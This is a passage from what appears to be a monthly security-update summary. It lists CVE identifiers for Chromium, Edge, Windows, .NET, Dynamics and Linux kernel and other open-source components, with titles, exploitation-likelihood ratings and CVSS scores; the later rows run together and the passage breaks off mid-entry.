CVE-2026-7986 | Chromium: CVE-2026-7986 Insufficient policy enforcement in Autofill | n/a | No |
CVE-2026-7987 | Chromium: CVE-2026-7987 Use after free in WebRTC | n/a | No |
CVE-2026-7988 | Chromium: CVE-2026-7988 Type Confusion in WebRTC | n/a | No |
CVE-2026-7989 | Chromium: CVE-2026-7989 Insufficient data validation in DataTransfer | n/a | No |
CVE-2026-7990 | Chromium: CVE-2026-7990 Insufficient validation of untrusted input in Updater | n/a | No |
CVE-2026-7991 | Chromium: CVE-2026-7991 Use after free in UI | n/a | No |
CVE-2026-7992 | Chromium: CVE-2026-7992 Insufficient validation of untrusted input in UI | n/a | No |
CVE-2026-7994 | Chromium: CVE-2026-7994 Inappropriate implementation in Chromoting | n/a | No |
CVE-2026-7995 | Chromium: CVE-2026-7995 Out of bounds read in AdFilter | n/a | No |
CVE-2026-7996 | Chromium: CVE-2026-7996 Insufficient validation of untrusted input in SSL | n/a | No |
CVE-2026-7997 | Chromium: CVE-2026-7997 Insufficient validation of untrusted input in Updater | n/a | No |
CVE-2026-7998 | Chromium: CVE-2026-7998 Insufficient validation of untrusted input in Dialog | n/a | No |
CVE-2026-7999 | Chromium: CVE-2026-7999 Inappropriate implementation in V8 | n/a | No |
CVE-2026-8000 | Chromium: CVE-2026-8000 Insufficient validation of untrusted input in ChromeDriver | n/a | No |
CVE-2026-8001 | Chromium: CVE-2026-8001 Use after free in Printing | n/a | No |
CVE-2026-8002 | Chromium: CVE-2026-8002 Use after free in Audio | n/a | No |
CVE-2026-8003 | Chromium: CVE-2026-8003 Insufficient validation of untrusted input in TabGroups | n/a | No |
CVE-2026-8004 | Chromium: CVE-2026-8004 Insufficient policy enforcement in DevTools | n/a | No |
CVE-2026-8005 | Chromium: CVE-2026-8005 Insufficient validation of untrusted input in Cast | n/a | No |
CVE-2026-8006 | Chromium: CVE-2026-8006 Insufficient policy enforcement in DevTools | n/a | No |
CVE-2026-8007 | Chromium: CVE-2026-8007 Insufficient validation of untrusted input in Cast | n/a | No |
CVE-2026-8008 | Chromium: CVE-2026-8008 Inappropriate implementation in DevTools | n/a | No |
CVE-2026-8009 | Chromium: CVE-2026-8009 Inappropriate implementation in Cast | n/a | No |
CVE-2026-8010 | Chromium: CVE-2026-8010 Insufficient validation of untrusted input in SiteIsolation | n/a | No |
CVE-2026-8011 | Chromium: CVE-2026-8011 Insufficient policy enforcement in Search | n/a | No |
CVE-2026-8012 | Chromium: CVE-2026-8012 Inappropriate implementation in MHTML | n/a | No |
CVE-2026-8013 | Chromium: CVE-2026-8013 Insufficient validation of untrusted input in FedCM | n/a | No |
CVE-2026-8014 | Chromium: CVE-2026-8014 Inappropriate implementation in Preload | n/a | No |
CVE-2026-8015 | Chromium: CVE-2026-8015 Inappropriate implementation in Media | n/a | No |
CVE-2026-8016 | Chromium: CVE-2026-8016 Use after free in WebRTC | n/a | No |
CVE-2026-8017 | Chromium: CVE-2026-8017 Side-channel information leakage in Media | n/a | No |
CVE-2026-8018 | Chromium: CVE-2026-8018 Insufficient policy enforcement in DevTools | n/a | No |
CVE-2026-8019 | Chromium: CVE-2026-8019 Insufficient policy enforcement in WebApp | n/a | No |
CVE-2026-8021 | Chromium: CVE-2026-8021 Script injection in UI | n/a | No |
CVE-2026-8022 | Chromium: CVE-2026-8022 Inappropriate implementation in MHTML | n/a | No |
CVE-2026-33111 | Copilot Chat (Microsoft Edge) Information Disclosure Vulnerability | Exploitation Less Likely | No | 7.5
CVE-2026-7896 | Chromium: CVE-2026-7896 Integer overflow in Blink | n/a | No |
CVE-2026-7897 | Chromium: CVE-2026-7897 Use after free in Mobile | n/a | No |
CVE-2026-7905 | Chromium: CVE-2026-7905 Insufficient validation of untrusted input in Media | n/a | No |
CVE-2026-7912 | Chromium: CVE-2026-7912 Integer overflow in GPU | n/a | No |
CVE-2026-7913 | Chromium: CVE-2026-7913 Insufficient policy enforcement in DevTools | n/a | No |
CVE-2026-7915 | Chromium: CVE-2026-7915 Insufficient data validation in DevTools | n/a | No |
CVE-2026-7931 | Chromium: CVE-2026-7931 Insufficient validation of untrusted input in iOS | n/a | No |
CVE-2026-7941 | Chromium: CVE-2026-7941 Insufficient validation of untrusted input in Mobile | n/a | No |
CVE-2026-7993 | Chromium: CVE-2026-7993 Insufficient validation of untrusted input in Payments | n/a | No |
CVE-2026-8020 | Chromium: CVE-2026-8020 Uninitialized Use in GPU | n/a | No |
CVE-2026-42838 | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 5.4
CVE-2026-42891 | Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability | Exploitation Unlikely | No | 6.5
CVE-2026-35429 | Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability | Exploitation Unlikely | No | 4.3
CVE-2026-40416 | Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability | Exploitation Unlikely | No | 4.3
CVE-2026-41107 | Microsoft Edge (Chromium-based) Information Disclosure Vulnerability | Exploitation Less Likely | No | 7.4

Developer Tools vulnerabilities

CVE | Title | Exploitation status | Publicly disclosed? | CVSS v3 base score
CVE-2026-42826 | Azure DevOps Information Disclosure Vulnerability | N/A | No | 10.0
CVE-2026-32175 | .NET Core Tampering Vulnerability | Exploitation Less Likely | No | 4.3
CVE-2026-32177 | .NET Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.3
CVE-2026-35433 | .NET Elevation of Privilege Vulnerability | Exploitation Unlikely | No | 7.3
CVE-2026-42899 | ASP.NET Core Denial of Service Vulnerability | Exploitation Unlikely | No | 7.5
CVE-2026-41109 | GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability | Exploitation Less Likely | No | 8.8
CVE-2026-41094 | Microsoft Data Formulator Remote Code Execution Vulnerability | Exploitation Less Likely | No | 8.8
CVE-2026-41613 | Visual Studio Code Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 8.8
CVE-2026-41612 | Visual Studio Code Information Disclosure Vulnerability | Exploitation Less Likely | No | 5.5
CVE-2026-41611 | Visual Studio Code Remote Code Execution Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-41610 | Visual Studio Code Security Feature Bypass Vulnerability | Exploitation Less Likely | No | 6.3

ESU vulnerabilities

CVE | Title | Exploitation status | Publicly disclosed? | CVSS v3 base score
CVE-2025-54518 | AMD: CVE-2025-54518 CPU OP Cache Corruption | Exploitation Unlikely | No |
CVE-2026-41095 | Data Deduplication Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-35424 | Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability | Exploitation Unlikely | No | 7.5
CVE-2026-40377 | Microsoft Cryptographic Services Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-34329 | Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability | Exploitation Less Likely | No | 8.8
CVE-2026-41097 | Secure Boot Security Feature Bypass Vulnerability | Exploitation Less Likely | No | 6.7
CVE-2026-33839 | Win32k Elevation of Privilege Vulnerability | Exploitation Unlikely | No | 7.0
CVE-2026-34330 | Win32k Elevation of Privilege Vulnerability | Exploitation Unlikely | No | 7.8
CVE-2026-34331 | Win32k Elevation of Privilege Vulnerability | Exploitation Unlikely | No | 7.0
CVE-2026-35423 | Windows 11 Telnet Client Information Disclosure Vulnerability | Exploitation Unlikely | No | 5.4
CVE-2026-34344 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-34345 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.0
CVE-2026-35416 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Exploitation More Likely | No | 7.0
CVE-2026-41088 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Exploitation Unlikely | No | 7.8
CVE-2026-34343 | Windows Application Identity (AppID) Subsystem Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-35418 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | Exploitation Unlikely | No | 7.8
CVE-2026-33835 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | Exploitation More Likely | No | 7.8
CVE-2026-34337 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-40407 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Exploitation Unlikely | No | 7.8
CVE-2026-40397 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Exploitation More Likely | No | 7.8
CVE-2026-34336 | Windows DWM Core Library Information Disclosure Vulnerability | Exploitation Unlikely | No | 7.8
CVE-2026-33834 | Windows Event Logging Service Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-32209 | Windows Filtering Platform (WFP) Security Feature Bypass Vulnerability | Exploitation Unlikely | No | 4.4
CVE-2026-35421 | Windows GDI Remote Code Execution Vulnerability | Exploitation Unlikely | No | 7.8
CVE-2026-40403 | Windows Graphics Component Remote Code Execution Vulnerability | Exploitation Less Likely | No | 8.8
CVE-2026-33841 | Windows Kernel Elevation of Privilege Vulnerability | Exploitation More Likely | No | 7.8
CVE-2026-35420 | Windows Kernel Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-34339 | Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability | Exploitation Less Likely | No | 5.5
CVE-2026-34341 | Windows Link-Layer Discovery Protocol (LLDP) Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.0
CVE-2026-33838 | Windows Message Queuing (MSMQ) Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-32161 | Windows Native WiFi Miniport Driver Remote Code Execution Vulnerability | Exploitation Less Likely | No | 7.5
CVE-2026-41089 | Windows Netlogon Remote Code Execution Vulnerability | Exploitation Less Likely | No | 9.8
CVE-2026-34342 | Windows Print Spooler Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.0
CVE-2026-34340 | Windows Projected File System Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.0
CVE-2026-40398 | Windows Remote Desktop Services Elevation of Privilege Vulnerability | Exploitation More Likely | No | 7.8
CVE-2026-21530 | Windows Rich Text Edit Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 6.7
CVE-2026-32170 | Windows Rich Text Edit Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 6.7
CVE-2026-40410 | Windows SMB Client Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.0
CVE-2026-35415 | Windows Storage Spaces Controller Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-40414 | Windows TCP/IP Denial of Service Vulnerability | Exploitation Unlikely | No | 7.4
CVE-2026-40401 | Windows TCP/IP Denial of Service Vulnerability | Exploitation Unlikely | No | 7.1
CVE-2026-40413 | Windows TCP/IP Denial of Service Vulnerability | Exploitation Less Likely | No | 7.4
CVE-2026-35422 | Windows TCP/IP Driver Security Feature Bypass Vulnerability | Exploitation Unlikely | No | 6.5
CVE-2026-34351 | Windows TCP/IP Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-40399 | Windows TCP/IP Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-34334 | Windows TCP/IP Elevation of Privilege Vulnerability | Exploitation Unlikely | No | 7.8
CVE-2026-40406 | Windows TCP/IP Information Disclosure Vulnerability | Exploitation Less Likely | No | 7.5
CVE-2026-33837 | Windows TCP/IP Local Elevation of Privilege Vulnerability | Exploitation More Likely | No | 7.8
CVE-2026-40415 | Windows TCP/IP Remote Code Execution Vulnerability | Exploitation Unlikely | No | 8.1
CVE-2026-42825 | Windows Telephony Service Elevation of Privilege Vulnerability | Exploitation Unlikely | No | 7.0
CVE-2026-34338 | Windows Telephony Service Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-40382 | Windows Telephony Service Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-40380 | Windows Volume Manager Extension Driver Remote Code Execution Vulnerability | Exploitation Less Likely | No | 6.2
CVE-2026-40408 | Windows WAN ARP Driver Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-34333 | Windows Win32k Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-34347 | Windows Win32k Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.0
CVE-2026-35417 | Windows Win32k Elevation of Privilege Vulnerability | Exploitation More Likely | No | 7.8

Mariner vulnerabilities

CVE | Title | Exploitation status | Publicly disclosed? | CVSS v3 base score
CVE-2026-7598 | libssh2 userauth.c userauth_password integer overflow | n/a | No | 7.3
CVE-2026-43870 | Apache Thrift: Node.js web_server.js multi-vulnerability | n/a | No | 7.3
CVE-2026-43868 | Apache Thrift: Rust implementation vulnerable to CVE-2020-13949 pattern | n/a | No | 5.3
CVE-2026-43869 | Apache Thrift: TSSLTransportFactory.java hostname verification | n/a | No | 7.3

Microsoft Dynamics vulnerabilities

CVE | Title | Exploitation status | Publicly disclosed? | CVSS v3 base score
CVE-2026-33821 | Microsoft Dynamics 365 Customer Insights Elevation of Privilege Vulnerability | N/A | No | 7.7
CVE-2026-40417 | Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability | Exploitation Less Likely | No | 7.8
CVE-2026-42898 | Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability | Exploitation Unlikely | No | 9.9
CVE-2026-42833 | Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability | Exploitation Less Likely | No | 9.1
CVE-2026-40374 | Microsoft Power Automate Desktop Information Disclosure Vulnerability | Exploitation Less Likely | No | 6.5

Open Source Software vulnerabilities

CVE | Title | Exploitation status | Publicly disclosed? | CVSS v3 base score
CVE-2026-31706 | ksmbd: validate num_aces and harden ACE walk in smb_inherit_dacl() | n/a | No | 8.8
CVE-2026-31723 | usb: gadget: f_subset: Fix net_device lifecycle with device_move | n/a | No | 7.8
CVE-2026-31724 | usb: gadget: f_eem: Fix net_device lifecycle with device_move | n/a | No | 7.8
CVE-2026-43053 | xfs: close crash window in attr dabtree inactivation | n/a | No | 5.5
CVE-2026-43048 | HID: core: Mitigate potential OOB by removing bogus memset() | n/a | No | 8.8
CVE-2026-31777 | ALSA: ctxfi: Check the error for index mapping | n/a | No | 7.0
CVE-2026-31722 | usb: gadget: f_rndis: Fix net_device lifecycle with device_move | n/a | No | 7.8
CVE-2026-43036 | net: use skb_header_pointer() for TCPv4 GSO frag_off check | n/a | No | 5.5
CVE-2026-31769 | gpib: fix use-after-free in IO ioctl handlers | n/a | No |
CVE-2026-31707 | ksmbd: validate response sizes in ipc_validate_msg() | n/a | No | 7.1
CVE-2026-31725 | usb: gadget: f_ecm: Fix net_device lifecycle with device_move | n/a | No | 7.8
CVE-2026-43049 | HID: logitech-hidpp: Prevent use-after-free on force feedback initialisation failure | n/a | No | 7.0
CVE-2026-43022 | Bluetooth: hci_sync: hci_cmd_sync_queue_once() return -EEXIST if exists | n/a | No |
CVE-2026-43042 | mpls: add seqcount to protect the platform_label{,s} pair | n/a | No | 7.1
CVE-2026-31771 | Bluetooth: hci_event: move wake reason storage into validated event handlers | n/a | No | 8.1
CVE-2026-43052 | wifi: mac80211: check tdls flag in ieee80211_tdls_oper | n/a | No | 7.0
CVE-2026-31709 | smb: client: validate the whole DACL before rewriting it in cifsacl | n/a | No | 8.8
CVE-2026-43021 | Bluetooth: hci_sync: fix leaks when hci_cmd_sync_queue_once fails | n/a | No |
CVE-2026-31712 | ksmbd: require minimum ACE size in smb_check_perm_dacl() | n/a | No | 8.3
CVE-2026-43010 | bpf: Reject sleepable kprobe_multi programs at attach time | n/a | No | 5.5
CVE-2026-43019 | Bluetooth: hci_conn: fix potential UAF in set_cig_params_sync | n/a | No | 7.8
CVE-2026-31729 | usb: typec: ucsi: validate connector number in ucsi_notify_common() | n/a | No | 7.0
CVE-2026-43045 | mshv: Fix error handling in mshv_region_pin | n/a | No |
CVE-2026-43009 | bpf: Fix incorrect pruning due to atomic fetch precision tracking | n/a | No | 7.8
CVE-2026-31715 | f2fs: fix UAF caused by decrementing sbi->nr_pages[] in f2fs_write_end_io() | n/a | No | 5.5
CVE-2026-31697 | crypto: ccp: Don't attempt to copy ID to userspace if PSP command failed | n/a | No | 7.1
CVE-2026-31721 | usb: gadget: f_hid: move list and spinlock inits from bind to alloc | n/a | No | 7.8
CVE-2026-31711 | smb: server: fix active_num_conn leak on transport allocation failure | n/a | No | 7.5
CVE-2026-31699 | crypto: ccp: Don't attempt to copy CSR to userspace if PSP command failed | n/a | No | 7.1
CVE-2026-31694 | fuse: reject oversized dirents in page cache | n/a | No | 7.8
CVE-2026-31705 | ksmbd: fix out-of-bounds write in smb2_get_ea() EA alignment | n/a | No | 9.8
CVE-2026-43033 | crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryption | n/a | No | 7.8
CVE-2026-31696 | rxrpc: Fix missing validation of ticket length in non-XDR key preparsing | n/a | No | 5.5
CVE-2026-31698 | crypto: ccp: Don't attempt to copy PDH cert to userspace if PSP command failed | n/a | No | 7.1
CVE-2026-31704 | ksmbd: use check_add_overflow() to prevent u16 DACL size overflow | n/a | No | 7.5
CVE-2026-31702 | f2fs: fix use-after-free of sbi in f2fs_compress_write_end_io() | n/a | No | 7.8
CVE-2026-31708 | smb: client: fix OOB read in smb2_ioctl_query_info QUERY_INFO path | n/a | No | 8.1
CVE-2026-31700 | net/packet: fix TOCTOU race on mmap'd vnet_hdr in tpacket_snd() | n/a | No | 7.8
CVE-2026-7598 | libssh2 userauth.c userauth_password integer overflow | n/a | No | 7.3
CVE-2026-43058 | media: vidtv: fix pass-by-value structs causing MSAN warnings | n/a | No | 7.1
CVE-2026-37457 |  | n/a | No | 7.5
CVE-2026-43964 |  | n/a | No | 3.7
CVE-2026-43037 | ip6_tunnel: clear skb2->cb[] in ip4ip6_err() | n/a | No | 7.0
CVE-2026-33190 | CoreDNS TSIG authentication bypass on encrypted DNS transports | n/a | No |
CVE-2026-33489 | CoreDNS transfer plugin subzone ACL bypass via lexicographic zone comparison | n/a | No |
CVE-2026-32936 | CoreDNS DoH GET path missing size validation causes CPU and memory amplification | n/a | No |
CVE-2026-32934 | CoreDNS DNS-over-QUIC unbounded goroutine growth leads to denial of service | n/a | No |
CVE-2026-35579 | CoreDNS TSIG authentication bypass on gRPC, QUIC, DoH, and DoH3 transports | n/a | No |
CVE-2026-43073 | x86-64: rename misleadingly named '__copy_user_nocache()' function | n/a | No | 2.5
CVE-2026-42151 | Prometheus Azure AD remote write OAuth client secret exposed via config API | n/a | No | 7.5
CVE-2026-42154 | Prometheus: remote read endpoint allows denial of service via crafted snappy payload | n/a | No | 7.5
CVE-2026-43125 | dlm: validate length in dlm_search_rsb_tree | n/a | No | 7.8
CVE-2026-43248 | vhost: move vdpa group bound check to vhost_vdpa | n/a | No | 7.1
CVE-2026-43176 | wifi: rtw89: pci: validate release report content before using for
RTL8922DEn/aNo7.0CVE-2026-43204ASoC: qcom: q6asm: drop DSP responses for closed data streamsn/aNo5.5CVE-2026-43131drm/amd/pm: Fix null pointer dereference issuen/aNo5.5CVE-2026-43126ALSA: mixer: oss: Add card disconnect checkpointsn/aNo5.5CVE-2026-43127ntfs3: fix circular locking dependency in run_unpack_exn/aNo5.5CVE-2026-43161iommu/vt-d: Skip dev-iotlb flush for inaccessible PCIe device without scalable moden/aNo5.5CVE-2026-43198tcp: fix potential race in tcp_v6_syn_recv_sock()n/aNo4.8CVE-2026-43245ntfs: ->d_compare() must not blockn/aNo7.1CVE-2025-71290misc: ti_fpc202: fix a potential memory leak in probe functionn/aNo5.5CVE-2026-43137ASoC: SOF: Intel: hda: Fix NULL pointer dereferencen/aNo5.5CVE-2026-43115srcu: Use irq_work to start GP in tiny SRCUn/aNo5.5CVE-2026-43234team: avoid NETDEV_CHANGEMTU event when unregistering slaven/aNo5.5CVE-2025-71293drm/amdgpu/ras: Move ras data alloc before bad page checkn/aNo5.5CVE-2026-43172wifi: iwlwifi: fix 22000 series SMEM parsingn/aNo5.3CVE-2025-71285net: qrtr: Drop the MHI auto_queue feature for IPCR DL channelsn/aNo4.7CVE-2026-43197netconsole: avoid OOB reads, msg is not nul-terminatedn/aNo5.5CVE-2026-43185ksmbd: fix signededness bug in smb_direct_prepare_negotiation()n/aNo5.5CVE-2025-71273wifi: rtw88: Use devm_kmemdup() in rtw_set_supported_band()n/aNo5.3CVE-2026-43118btrfs: fix zero size inode with non-zero size after log replayn/aNo3.3CVE-2026-43109x86: shadow stacks: proper error handling for mmap lockn/aNo7.1CVE-2026-43153xfs: remove xfs_attr_leaf_hasnamen/aNo7.1CVE-2026-43129ima: verify the previous kernel's IMA buffer lies in addressable RAMn/aNo5.5CVE-2026-43116netfilter: ctnetlink: ensure safe access to master conntrackn/aNo7.1CVE-2026-43274mailbox: mchp-ipc-sbi: fix out-of-bounds access in mchp_ipc_get_cluster_aggr_irq()n/aNo7.1CVE-2026-43244kcm: fix zero-frag skb in frag_list on partial sendmsg errorn/aNo5.5CVE-2026-43191drm/amd/display: Adjust PHY FSM transition to TX_EN-to-PLL_ON for TMDS on 
DCN35n/aNo5.5CVE-2026-43258alpha: fix user-space corruption during memory compactionn/aNo5.5CVE-2025-71289fs/ntfs3: handle attr_set_size() errors when truncating filesn/aNo7.1CVE-2026-43107xfrm: account XFRMA_IF_ID in aevent size calculationn/aNo5.5CVE-2026-43243drm/amd/display: Add signal type check for dcn401 get_phyd32clk_srcn/aNo5.5CVE-2025-71294drm/amdgpu: fix NULL pointer issue buffer funcsn/aNo5.5CVE-2026-43250usb: chipidea: udc: fix DMA and SG cleanup in _ep_nuke()n/aNo7.1CVE-2026-43237drm/amdgpu: Refactor amdgpu_gem_va_ioctl for Handling Last Fence Update and Timeline Management v4n/aNo5.5CVE-2026-43201APEI/GHES: ARM processor Error: don't go past allocated memoryn/aNo5.5CVE-2026-43219net: cpsw_new: Fix potential unregister of netdev that has not been registered yetn/aNo7.1CVE-2026-43165hwmon: (nct7363) Fix a resource leak in nct7363_present_pwm_faninn/aNo5.5CVE-2026-43088net: af_key: zero aligned sockaddr tail in PF_KEY exportsn/aNo7.1CVE-2026-43195drm/amdgpu: validate user queue size constraintsn/aNo7.1CVE-2025-71272most: core: fix resource leak in most_register_interface error pathsn/aNo5.5CVE-2026-43213wifi: rtw89: pci: validate sequence number of TX release reportn/aNo7.0CVE-2026-43228hfs: Replace BUG_ON with error handling for CNID count checksn/aNo7.1CVE-2026-43216net: Drop the lock in skb_may_tx_timestamp()n/aNo5.5CVE-2026-43119Bluetooth: hci_sync: annotate data-races around hdev->req_statusn/aNo5.3CVE-2026-43267wifi: rtw89: fix potential zero beacon interval in beacon trackingn/aNo7.0CVE-2026-43101ipv6: ioam: fix potential NULL dereferences in __ioam6_fill_trace_data()n/aNo7.0CVE-2026-43199net/mlx5e: Fix "scheduling while atomic" in IPsec MAC address queryn/aNo7.0CVE-2026-43083net: ioam6: fix OOB and missing lockn/aNo7.0CVE-2026-43870Apache Thrift: Node.js web_server.js multi-vulnerabilityn/aNo7.3CVE-2026-43868Apache Thrift: Rust implementation vulnerable to CVE-2020-13949 patternn/aNo5.3CVE-2026-33523Apache HTTP Server: multiple modules: HTTP 
response splitting forwarding malicious status linen/aNo6.5CVE-2026-23918Apache HTTP Server: http2: double free and possible RCE on early resetn/aNo8.8CVE-2026-34059Apache HTTP Server: mod_proxy_ajp: Heap Over-Read and memory disclosure in ajp_parse_data()n/aNo7.5CVE-2026-34032Apache HTTP Server: mod_proxy_ajp: Heap Buffer Over-Read Due to Missing Null-Termination Check (ajp_msg_get_string)n/aNo5.3CVE-2026-24072Apache HTTP Server: mod_rewrite elevation of privileges via ap_exprn/aNo8.8CVE-2026-33006Apache HTTP Server: mod_auth_digest timing attackn/aNo4.8CVE-2026-33007Apache HTTP Server: mod_authn_socache crashn/aNo5.3CVE-2026-29169Apache HTTP Server: mod_dav_lock indirect lock crashn/aNo7.5CVE-2026-29168Apache HTTP Server: mod_md unrestricted OCSP responsen/aNo7.3CVE-2026-33857Apache HTTP Server: Off-by-one OOB reads in AJP getter functionsn/aNo5.3CVE-2026-41672xmldom: XML node injection through unvalidated comment serializationn/aNoCVE-2026-41674xmldom: XML injection through unvalidated DocumentType serializationn/aNoCVE-2026-41675xmldom: XML node injection through unvalidated processing instruction serializationn/aNoCVE-2026-41673xmldom: Denial of service via uncontrolled recursion in XML serializationn/aNoCVE-2026-25243redis-server RESTORE invalid memory access may allow remote code executionn/aNoCVE-2026-23631redis-server Lua use-after-free may allow remote code executionn/aNoCVE-2026-31717ksmbd: validate owner of durable handle on reconnectn/aNo8.8CVE-2026-31718ksmbd: fix use-after-free in __ksmbd_close_fd() via durable scavengern/aNo9.8CVE-2026-23479redis-server use-after-free in unblock client flow may allow remote code executionn/aNoCVE-2026-25588RedisTimeSeries RESTORE invalid memory access may allow remote code executionn/aNoCVE-2026-25589RedisBloom RESTORE invalid memory access may allow remote code executionn/aNoCVE-2026-43474fs: init flags_valid before calling vfs_fileattr_getn/aNoCVE-2026-43338btrfs: reserve enough transaction items for qgroup 
ioctlsn/aNoCVE-2025-71302drm/panthor: fix for dma-fence safe access rulesn/aNoCVE-2026-43318drm/amdgpu: fix sync handling in amdgpu_dma_buf_move_notifyn/aNo7.1CVE-2026-43309md raid: fix hang when stopping arrays with metadata through dm-raidn/aNo5.5CVE-2026-43416powerpc, perf: Check that current->mm is alive before getting user callchainn/aNoCVE-2025-71299spi: cadence-quadspi: Parse DT for flashes with the rest of the DT parsingn/aNo5.5CVE-2026-43284xfrm: esp: avoid in-place decrypt on shared skb fragsn/aNo7.8CVE-2026-43352i3c: mipi-i3c-hci: Correct RING_CTRL_ABORT handling in DMA dequeuen/aNo5.5CVE-2026-43300drm/panel: Fix a possible null-pointer dereference in jdi_panel_dsi_remove()n/aNo5.5CVE-2026-43331x86/kexec: Disable KCOV instrumentation after load_segments()n/aNoCVE-2026-43320drm/amd/display: Fix dsc eDP issuen/aNoCVE-2026-43306bpf: crypto: Use the correct destructor kfunc typen/aNo7.0CVE-2026-43443ASoC: amd: acp-mach-common: Add missing error check for clock acquisitionn/aNoCVE-2026-43317most: core: fix leak on early registration failuren/aNoCVE-2026-43319spi: spidev: fix lock inversion between spi_lock and buf_lockn/aNoCVE-2026-43303mm/page_alloc: clear page->private in free_pages_prepare()n/aNo7.0CVE-2026-43344perf/x86/intel/uncore: Fix die ID init and look up bugsn/aNoCVE-2026-43321bpf: Properly mark live registers for indirect jumpsn/aNo7.8CVE-2026-43456bonding: fix type confusion in bond_setup_by_slave()n/aNo5.5CVE-2026-43305drm/amd/display: Fix mismatched unlock for DMUB HW lock in HWSS fast pathn/aNo5.5CVE-2026-43298drm/amdgpu: Skip vcn poison irq release on VFn/aNo7.8CVE-2026-43299btrfs: do not ASSERT() when the fs flips RO inside btrfs_repair_io_failure()n/aNo5.5CVE-2026-43400drm/amdgpu: add upper bound check on user inputs in signal ioctln/aNoCVE-2026-43310media: verisilicon: Avoid G2 bus error while decoding H.264 and HEVCn/aNo5.5CVE-2026-43294drm: renesas: rz-du: mipi_dsi: fix kernel panic when rebooting for some 
panelsn/aNo5.5CVE-2026-43353i3c: mipi-i3c-hci: Fix race in DMA ring dequeuen/aNo7.8CVE-2026-43292mm/vmalloc: prevent RCU stalls in kasan_release_vmalloc_noden/aNo5.5CVE-2026-43398drm/amdgpu: add upper bound check on user inputs in wait ioctln/aNoCVE-2026-43311soc/tegra: pmc: Fix unsafe generic_handle_irq() calln/aNo5.5CVE-2026-43421usb: gadget: f_ncm: Fix net_device lifecycle with device_moven/aNoCVE-2026-43308btrfs: don't BUG() on unexpected delayed ref type in run_one_delayed_ref()n/aNo5.5CVE-2026-37458n/aNo6.5CVE-2026-37459n/aNo7.5CVE-2026-33846Gnutls: gnutls: denial of service via heap buffer overflow in dtls handshake fragment reassemblyn/aNo7.5CVE-2026-6664PgBouncer integer overflow in PgBouncer network packet parsingn/aNo7.5CVE-2026-6665PgBouncer buffer overflow in SCRAMn/aNo8.1CVE-2026-6667PgBouncer missing authorization check in KILL_CLIENT admin commandn/aNo4.3CVE-2026-6666PgBouncer crash in kill_pool_logins_server_errorn/aNo5.9CVE-2026-45130Vim: Heap Buffer Overflow in spell file loadingn/aNo6.6CVE-2026-44656Vim: OS Command Injection via 'path' completionn/aNoCVE-2026-33811Crash when handling long CNAME response in netn/aNo7.5CVE-2026-33814Infinite loop in HTTP/2 transport when given bad SETTINGS_MAX_FRAME_SIZE in net/http/internal/http2 in golang.org/x/netn/aNo7.5CVE-2026-39817Invoking "go tool pack" does not sanitize output paths in cmd/gon/aNo5.9CVE-2026-39819Invoking "go bug" follows symlinks in predictable temporary filenames in cmd/gon/aNo5.3CVE-2026-39820Quadratic string concatentation in consumeComment in net/mailn/aNo7.5CVE-2026-39823Bypass of meta content URL escaping causes XSS in html/templaten/aNo6.1CVE-2026-39825ReverseProxy forwards queries with more than urlmaxqueryparams parameters in net/http/httputiln/aNo5.3CVE-2026-39826Escaper bypass leads to XSS in html/templaten/aNo6.1CVE-2026-39836Panic in Dial and LookupPort when handling NUL byte on Windows in netn/aNo7.5CVE-2026-42499Quadratic string concatenation in consumePhrase in 
